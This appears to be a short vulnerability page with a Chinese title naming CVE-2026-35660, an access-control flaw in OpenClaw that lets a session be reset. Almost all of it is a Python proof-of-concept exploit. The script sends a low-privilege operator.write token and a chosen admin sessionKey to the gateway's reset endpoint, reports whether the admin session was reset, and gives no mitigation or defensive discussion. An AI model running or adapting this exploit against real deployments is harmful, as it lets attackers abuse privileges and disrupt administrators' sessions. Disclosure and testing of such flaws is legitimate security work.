CVE-2026-35660 OpenClaw访问控制漏洞导致会话重置

# PoC for CVE-2026-35660 # This script demonstrates how an attacker with operator.write privileges # can reset an arbitrary admin session by specifying a sessionKey. import requests target_url = "http://target-openclaw-gateway/reset" headers = { "Content-Type": "application/json" } # The attacker's low-privilege token auth_token = "ATTACKER_OPERATOR_WRITE_TOKEN" # The session key of the admin that the attacker wants to reset target_admin_session_key = "TARGET_ADMIN_SESSION_KEY" payload = { "sessionKey": target_admin_session_key } cookies = { "auth": auth_token } try: response = requests.post(target_url, json=payload, headers=headers, cookies=cookies) if response.status_code == 200: print(f"[+] Success: Admin session {target_admin_session_key} has been reset.") else: print(f"[-] Failed: Status code {response.status_code}") except Exception as e: print(f"Error: {e}")